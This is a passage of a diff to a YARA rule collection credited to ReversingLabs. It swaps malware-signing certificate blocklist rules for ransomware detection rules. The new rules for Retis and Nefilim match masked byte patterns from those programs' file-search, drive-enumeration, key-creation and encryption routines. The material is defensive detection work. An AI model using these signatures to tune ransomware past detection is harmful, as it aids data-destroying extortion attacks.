+            E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 7D ?? ?? 72 ?? FF 75 ?? E8 ?? ??
+            ?? ?? 83 C4 ?? 83 7D ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? 72
+            ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ??
+            ?? ?? ?? ?? C6 45 ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C7 85 ?? ?? ??
+            ?? ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 8D 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 7D
+            ?? ?? 72 ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 7D ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45
+            ?? ?? ?? ?? ?? C6 45 ?? ?? 72 ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 64 89 0D
+            ?? ?? ?? ?? 59 5F 5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3
+        }
+		$enum_drives_p1 = {
+            6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ??
+            ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ??
+            ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ??
+            ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ??
+            ?? ?? 8D 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ??
+            C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 85 ??
+            ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ??
+            ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 8D ??
+            ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85
+        }
+		$enum_drives_p2 = {
+            E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ??
+            C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ??
+            ?? 8D 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6
+            85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 85 ?? ??
+            ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ??
+            6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ??
+            ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7
+            85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 85
+            ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8D
+            4D ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 6A ?? 68
+            ?? ?? ?? ?? 8D 4D ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? E8
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SK AI MAS GmbH" and ( pe.signatures [ i ] . serial == "00:ae:ba:4c:39:30:6f:dd:02:28:49:86:78:01:64:58:14" or pe.signatures [ i ] . serial == "ae:ba:4c:39:30:6f:dd:02:28:49:86:78:01:64:58:14" ) and 1579478400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( ( all of ( $enum_directories_p* ) ) and ( all of ( $enum_drives_p* ) ) and ( all of ( $encrypt_files_p* ) ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_028D50Ae0C554B49148E82Db5B1C2699 : INFO FILE
+rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Retis : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Retis ransomware."
 		author = "ReversingLabs"
-		id = "76ccda8a-bdea-5db2-a3a4-11292bfb3c95"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "3d1de7c2-abb7-5411-a598-6bc68229a22a"
+		date = "2021-08-12"
+		modified = "2021-08-12"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L3978-L3994"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/ByteCode.MSIL.Ransomware.Retis.yara#L1-L74"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "e3cc0066cad56d78a3f42e092befa3b0855b2ed33c8465c5ecbb19fec082d35e"
+		logic_hash = "3e3429041acc5730b009916efbcd35c7cfd2b2877dc1d2cf980f7fb7d399d532"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Retis"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$search_files = {
+            00 00 04 6F ?? ?? ?? ?? 0B 38 ?? ?? ?? ?? 12 ?? 28 ?? ?? ?? ?? 0C 00 08 28 ?? ?? ?? ??
+            0A 72 ?? ?? ?? ?? 06 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 00 03 6F ?? ?? ??
+            ?? 0D 38 ?? ?? ?? ?? 12 ?? 28 ?? ?? ?? ?? 13 ?? 00 00 72 ?? ?? ?? ?? 11 ?? 72 ?? ?? ??
+            ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 06 72 ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 28 ?? ?? ??
+            ?? 17 28 ?? ?? ?? ?? 73 ?? ?? ?? ?? 13 ?? 00 11 ?? 6F ?? ?? ?? ?? 13 ?? 38 ?? ?? ?? ??
+            12 ?? 28 ?? ?? ?? ?? 13 07 00 11 ?? 73 ?? ?? ?? ?? 13 ?? 02 11 ?? 28 ?? ?? ?? ?? 16 FE
+            ?? 13 ?? 11 ?? 2C ?? 00 02 11 ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 1F ?? 28 ?? ?? ?? ??
+            00 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 28 ?? ?? ?? ?? 00 11 ?? 6F ?? ?? ?? ?? 28 ?? ?? ??
+            ?? 00 00 2B ?? 00 1F ?? 28 ?? ?? ?? ?? 00 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 28 ?? ?? ??
+            ?? 00 72 ?? ?? ?? ?? 11 ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 00 00 12 ??
+            28 ?? ?? ?? ?? 3A ?? ?? ?? ?? DE ?? 12 ?? FE ?? ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 DC 00 DE
+            ?? 26 00 00 DE ?? 00 12 ?? 28 ?? ?? ?? ?? 3A ?? ?? ?? ?? DE ?? 12 ?? FE ?? ?? ?? ?? ??
+            6F ?? ?? ?? ?? 00 DC 00 12 ?? 28 ?? ?? ?? ?? 3A ?? ?? ?? ?? DE ?? 12 ?? FE ?? ?? ?? ??
+            ?? 6F ?? ?? ?? ?? 00 DC 2A
+        }
+		$search_drives = {
+            00 28 ?? ?? ?? ?? 0A 73 ?? ?? ?? ?? 0B 00 06 0C 16 0D 2B ?? 08 09 9A 13 ?? 00
+            11 ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 2C ?? 00 07 11 ?? 6F ?? ?? ?? ?? 6F ?? ?? ??
+            ?? 6F ?? ?? ?? ?? 00 00 00 09 17 58 0D 09 08 8E 69 32 ?? 07 72 ?? ?? ?? ?? 6F
+            ?? ?? ?? ?? 26 00 07 6F ?? ?? ?? ?? 13 ?? 38 ?? ?? ?? ?? 12 ?? 28 ?? ?? ?? ??
+            13 ?? 00 28 ?? ?? ?? ?? 00 72 ?? ?? ?? ?? 11 ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ??
+            28 ?? ?? ?? ?? 00 28 ?? ?? ?? ?? 00 00 03 6F ?? ?? ?? ?? 13 ?? 38 ?? ?? ?? ??
+            12 ?? 28 ?? ?? ?? ?? 13 ?? 00 00 72 ?? ?? ?? ?? 11 ?? 72 ?? ?? ?? ?? 28 ?? ??
+            ?? ?? 28 ?? ?? ?? ?? 00 11 ?? 72 ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 28 ?? ?? ??
+            ?? 17 28 ?? ?? ?? ?? 73 ?? ?? ?? ?? 13 ?? 00 11 ?? 6F ?? ?? ?? ?? 13 ?? 2B ??
+            12 ?? 28 ?? ?? ?? ?? 13 ?? 00 02 11 ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 1F ??
+            28 ?? ?? ?? ?? 00 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 28 ?? ?? ?? ?? 00 11 ?? 6F
+            ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 00 12 ?? 28 ?? ?? ?? ?? 2D ?? DE ?? 12 ?? FE ??
+            ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 DC 00 DE ?? 26 00 00 DE ?? 00 12 ?? 28 ?? ?? ??
+            ?? 3A ?? ?? ?? ?? DE ?? 12 ?? FE ?? ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 DC 00 12 ??
+            28 ?? ?? ?? ?? 3A ?? ?? ?? ?? DE ?? 12 ?? FE ?? ?? ?? ?? ?? 6F ?? ?? ?? ?? 00
+            DC 2A
+        }
+		$encrypt_files = {
+            00 03 19 17 73 ?? ?? ?? ?? 0A 06 6F ?? ?? ?? ?? D4 8D ?? ?? ?? ?? 0B 06 07
+            16 07 8E 69 6F ?? ?? ?? ?? 26 06 6F ?? ?? ?? ?? 00 03 18 18 73 ?? ?? ?? ??
+            0C 73 ?? ?? ?? ?? 0D 09 28 ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F
+            ?? ?? ?? ?? 00 09 28 ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F ?? ??
+            ?? ?? 00 09 6F ?? ?? ?? ?? 13 ?? 08 11 ?? 17 73 ?? ?? ?? ?? 13 ?? 11 ?? 07
+            16 07 8E 69 6F ?? ?? ?? ?? 00 11 ?? 6F ?? ?? ?? ?? 00 08 6F ?? ?? ?? ?? 00
+            03 03 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 2A
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "VAS CO PTY LTD" and pe.signatures [ i ] . serial == "02:8d:50:ae:0c:55:4b:49:14:8e:82:db:5b:1c:26:99" and 1579478400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $search_files and $search_drives and $encrypt_files )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_684F478C7259Dde0Cfe2260112Ca9846 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Nefilim : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Nefilim ransomware."
 		author = "ReversingLabs"
-		id = "840af428-47e0-529e-9db9-8ab9c968f2e3"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "aec298c1-abf8-5446-9dbb-795f9fcf8e94"
+		date = "2020-06-26"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L3996-L4012"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Nefilim.yara#L1-L150"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "59654ba1df27029a04ef3b1a1bb54f6c15b727f2013923a11a729752b8829743"
+		logic_hash = "fae0350e51aee2777475d2222848b30fd39fa39ceea260132b0c7fbc536b3a86"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Nefilim"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$create_encryption_key = {
+            55 8B EC 51 A1 ?? ?? ?? ?? C1 E8 ?? 6B C0 ?? 56 50 E8 ?? ?? ?? ?? 83 3D ?? ?? ?? ??
+            ?? 8B F0 A1 ?? ?? ?? ?? 59 89 75 ?? 73 ?? B8 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? 50 E8 ??
+            ?? ?? ?? 33 F6 59 59 39 35 ?? ?? ?? ?? 75 ?? 53 57 8B 3D ?? ?? ?? ?? 56 6A ?? 56 BE
+            ?? ?? ?? ?? 56 BB ?? ?? ?? ?? 53 FF D7 85 C0 75 ?? 6A ?? 6A ?? 50 56 53 FF D7 85 C0
+            75 ?? 50 FF 15 ?? ?? ?? ?? 5F 33 F6 5B A1 ?? ?? ?? ?? C1 E8 ?? 6B C0 ?? 68 ?? ?? ??
+            ?? 56 56 50 FF 75 ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? 56 EB ?? 5E C9
+            C3
+        }
+		$encrypt_encryption_key = {
+            55 8B EC 83 EC ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 68 ?? ?? ?? ?? 8D 45 ?? 8D 4D ?? E8
+            ?? ?? ?? ?? 83 78 ?? ?? 59 72 ?? 8B 00 53 56 57 33 DB 53 53 6A ?? 53 53 68 ?? ?? ??
+            ?? 50 FF 15 ?? ?? ?? ?? 6A ?? 33 FF 8D 75 ?? 89 45 ?? E8 ?? ?? ?? ?? 39 5D ?? 0F 84
+            ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? BF ?? ?? ?? ?? 57 FF D3 99 83 E2 ?? 03 C2 C1 F8 ?? 6B
+            C0 ?? 50 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 57 8B F0 FF D3 50 57 E8 ?? ??
+            ?? ?? 59 59 57 FF D3 99 83 E2 ?? 03 C2 C1 F8 ?? 6B C0 ?? 89 45 ?? 8D 45 ?? 50 56 6A
+            ?? 6A ?? 6A ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 6A ?? 85 C0 75 ?? FF 15 ?? ?? ??
+            ?? 8D 45 ?? 50 57 FF D3 99 83 E2 ?? 03 C2 C1 F8 ?? 6B C0 ?? 50 56 FF 75 ?? FF 15 ??
+            ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 56 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ??
+            6A ?? 33 FF 8D 75 ?? E8 ?? ?? ?? ?? 8B 4D ?? 5F 5E 33 CD 5B E8 ?? ?? ?? ?? C9 C3
+        }
+		$encrypt_files_p1 = {
+            55 8B EC 83 E4 ?? 83 EC ?? A1 ?? ?? ?? ?? 33 C4 89 44 24 ?? 83 7D ?? ?? 8B 45 ?? 53
+            56 57 73 ?? 8D 45 ?? 33 DB 53 53 6A ?? 53 53 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 89
+            44 24 ?? 3B C3 0F 84 ?? ?? ?? ?? 8D 4C 24 ?? 51 50 FF 15 ?? ?? ?? ?? A1 ?? ?? ?? ??
+            6B C0 ?? 83 C0 ?? 83 F8 ?? 0F 8E ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 6A ?? 89 44 24 ??
+            E8 ?? ?? ?? ?? FF 74 24 ?? 89 44 24 ?? E8 ?? ?? ?? ?? FF 74 24 ?? E8 ?? ?? ?? ?? BE
+            ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 56 89 44 24 ?? E8 ?? ?? ?? ?? FF 74 24 ?? 8B 54 24 ??
+            89 44 24 ?? E8 ?? ?? ?? ?? FF 74 24 ?? 8B 54 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? FF 15 ??
+            ?? ?? ?? 83 3D ?? ?? ?? ?? ?? 7E ?? 68 ?? ?? ?? ?? 8D 74 24 ?? E8 ?? ?? ?? ?? 6A ??
+            33 FF E8 ?? ?? ?? ?? BE ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 53 53 FF 74 24 ?? FF 74 24 ??
+            FF 74 24 ?? FF D7 53 FF 15 ?? ?? ?? ?? 53 8D 44 24 ?? 50 56 FF 74 24 ?? FF 74 24 ??
+            FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83
+            F8 ?? 0F 84 ?? ?? ?? ?? 8B 44 24 ?? 8B 4C 24 ?? 53 03 C6 53 13 CB 51 50 FF 74 24 ??
+            FF D7 53 8D 44 24 ?? 50 56 FF 74 24 ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? 8B 44 24 ?? 8B
+        }
+		$encrypt_files_p2 = {
+            4C 24 ?? 53 05 ?? ?? ?? ?? 53 13 CB 51 50 FF 74 24 ?? FF D7 53 E8 ?? ?? ?? ?? 0B C2
+            59 74 ?? 68 ?? ?? ?? ?? 8D 44 24 ?? E8 ?? ?? ?? ?? 6A ?? 33 FF 8D 74 24 ?? E8 ?? ??
+            ?? ?? 8B 3D ?? ?? ?? ?? 53 8D 44 24 ?? 50 FF 35 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 74
+            24 ?? FF 15 ?? ?? ?? ?? 8B 44 24 ?? 8B 4C 24 ?? 3B C3 0F 8C ?? ?? ?? ?? 7F ?? 81 F9
+            ?? ?? ?? ?? 0F 86 ?? ?? ?? ?? 89 5C 24 ?? 89 5C 24 ?? 3B C3 0F 8C ?? ?? ?? ?? 7F ??
+            3B CB 0F 86 ?? ?? ?? ?? BE ?? ?? ?? ?? EB ?? 8B 4C 24 ?? 2B 4C 24 ?? 1B 44 24 ?? 89
+            44 24 ?? 0F 88 ?? ?? ?? ?? 7F ?? 81 F9 ?? ?? ?? ?? 0F 82 ?? ?? ?? ?? 56 53 FF 15 ??
+            ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 53 53 FF 74 24 ?? 89 44 24 ?? FF 74 24 ?? FF 74 24 ??
+            FF D7 53 8D 44 24 ?? 50 56 FF 74 24 ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? 8B 4C 24 ?? 8B
+            54 24 ?? 51 56 FF 74 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 53 53 FF 74 24 ?? FF 74 24 ?? FF
+            74 24 ?? FF D7 53 8D 44 24 ?? 50 56 FF 74 24 ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? FF 15
+            ?? ?? ?? ?? FF 74 24 ?? 53 50 FF 15 ?? ?? ?? ?? 81 44 24 ?? ?? ?? ?? ?? 8B 44 24 ??
+            11 5C 24 ?? 39 44 24 ?? 0F 8C ?? ?? ?? ?? 0F 8F ?? ?? ?? ?? 8B 4C 24 ?? 39 4C 24 ??
+            0F 82 ?? ?? ?? ?? E9 ?? ?? ?? ?? 3B C3 0F 8C ?? ?? ?? ?? 7F ?? 81 F9 ?? ?? ?? ?? 0F
+        }
+		$encrypt_files_p3 = {
+            86 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 74 24 ?? E8 ?? ?? ?? ?? BE ?? ?? ?? ?? 56 E8 ?? ??
+            ?? ?? 59 89 44 24 ?? FF 15 ?? ?? ?? ?? 53 53 33 C9 51 33 C0 50 FF 74 24 ?? FF D7 53
+            8D 44 24 ?? 50 56 FF 74 24 ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? 8B 4C 24 ?? 8B 54 24 ??
+            51 56 FF 74 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 53 53 33 C0 50 50 FF 74 24 ?? FF D7 53 8D
+            44 24 ?? 50 56 FF 74 24 ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? FF 74 24 ?? E8 ?? ?? ?? ??
+            59 E9 ?? ?? ?? ?? 51 53 FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 89 44 24 ?? FF 15 ??
+            ?? ?? ?? 53 53 33 C0 50 53 FF 74 24 ?? FF D7 53 8D 44 24 ?? 50 FF 74 24 ?? FF 74 24
+            ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 74 24 ?? E8 ?? ?? ?? ?? 8B 4C 24
+            ?? 8B 54 24 ?? 51 FF 74 24 ?? FF 74 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 53 53 33 C0 50 53
+            FF 74 24 ?? FF D7 53 8D 44 24 ?? 50 FF 74 24 ?? FF 74 24 ?? FF 74 24 ?? FF 15 ?? ??
+            ?? ?? FF 74 24 ?? 53 FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 6A ?? 33 FF 8D 74 24 ??
+            E8 ?? ?? ?? ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? FF 74 24 ?? E8 ?? ?? ?? ?? FF 74 24 ??
+            E8 ?? ?? ?? ?? FF 74 24 ?? E8 ?? ?? ?? ?? FF 74 24 ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ??
+            8D 45 ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 78 ?? ?? 72 ?? 8B 00 83 7D ?? ?? 8B
+            4D ?? 73 ?? 8D 4D ?? 50 51 FF 15 ?? ?? ?? ?? 6A ?? 33 FF 8D 74 24 ?? E8 ?? ?? ?? ??
+            6A ?? 33 FF 8D 75 ?? E8 ?? ?? ?? ?? 8B 4C 24 ?? 5F 5E 5B 33 CC E8 ?? ?? ?? ?? 8B E5
+            5D C3
+        }
+		$find_files_1 = {
+            55 8B EC 83 E4 ?? 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ?? ?? ?? 53 56
+            57 6A ?? 5E 33 C0 33 FF 6A ?? 66 89 44 24 ?? 57 8D 45 ?? 8D 4C 24 ?? 89 74 24 ?? 89
+            7C 24 ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 66
+            89 44 24 ?? 66 89 44 24 ?? 8B 84 24 ?? ?? ?? ?? 03 44 24 ?? 8D 4C 24 ?? 89 74 24 ??
+            89 7C 24 ?? 89 74 24 ?? 89 7C 24 ?? E8 ?? ?? ?? ?? 57 8D 44 24 ?? 50 83 C8 ?? 8D 74
+            24 ?? E8 ?? ?? ?? ?? 57 8D 84 24 ?? ?? ?? ?? 50 83 C8 ?? E8 ?? ?? ?? ?? 8B DE 8D 44
+            24 ?? E8 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 83 7C 24 ?? ?? 8B 44 24 ?? 73 ?? 8D 44 24
+            ?? 8D 8C 24 ?? ?? ?? ?? 51 50 FF 15 ?? ?? ?? ?? 89 44 24 ?? 83 F8 ?? 0F 84 ?? ?? ??
+            ?? 8B 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 24
+        }
+		$find_files_2 = {
+            D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF D6 85 C0 0F 84
+            ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? F6
+            84 24 ?? ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 8D 4C 24 ?? 8D 44 24 ?? 74 ?? E8 ?? ??
+            ?? ?? 8D 4C 24 ?? 51 E8 ?? ?? ?? ?? 59 8B D8 59 8D 44 24 ?? E8 ?? ?? ?? ?? 6A ?? 33
+            FF 8D 74 24 ?? E8 ?? ?? ?? ?? 6A ?? 8D 74 24 ?? E8 ?? ?? ?? ?? 83 EC ?? 8B CC 21 79
+            ?? 33 C0 6A ?? C7 41 ?? ?? ?? ?? ?? 66 89 01 50 8D 44 24 ?? E8 ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D8 59 8D 44 24 ?? E8 ?? ?? ?? ?? 6A
+            ?? 33 FF 8D 74 24 ?? E8 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 50 8D
+            44 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 6A ?? 5F 39 7C 24 ?? 73 ?? 8D 44 24 ?? 8B 35 ??
+            ?? ?? ?? 68
+        }
+		$find_files_3 = {
+            50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 8B 44 24 ?? 39 7C 24 ?? 73 ?? 8D 44 24 ?? 68 ?? ??
+            ?? ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 8B 44 24 ?? 39 7C 24 ?? 73 ?? 8D 44 24 ?? 68
+            ?? ?? ?? ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 8B 44 24 ?? 39 7C 24 ?? 73 ?? 8D 44 24
+            ?? 68 ?? ?? ?? ?? 50 FF D6 85 C0 74 ?? 8B 44 24 ?? 39 7C 24 ?? 73 ?? 8D 44 24 ?? 68
+            ?? ?? ?? ?? 50 FF D6 85 C0 74 ?? 8B 44 24 ?? 39 7C 24 ?? 73 ?? 8D 44 24 ?? 68 ?? ??
+            ?? ?? 50 FF D6 85 C0 74 ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF D6 85 C0 74 ??
+            8B 4C 24 ?? 39 7C 24 ?? 73 ?? 8D 4C 24 ?? 83 EC ?? 8B C4 51 E8 ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 83 C4 ?? 6A ?? 33 FF 8D 74 24 ?? E8 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF 74
+            24 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? 33 DB
+            43 53 33 FF 8D 74 24 ?? E8 ?? ?? ?? ?? 53 8D B4 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 53 8D
+            74 24 ?? E8 ?? ?? ?? ?? 53 8D 75 ?? E8 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 5F 5E 5B 33
+            CC E8 ?? ?? ?? ?? 8B E5 5D C3
+        }
+
 	condition:
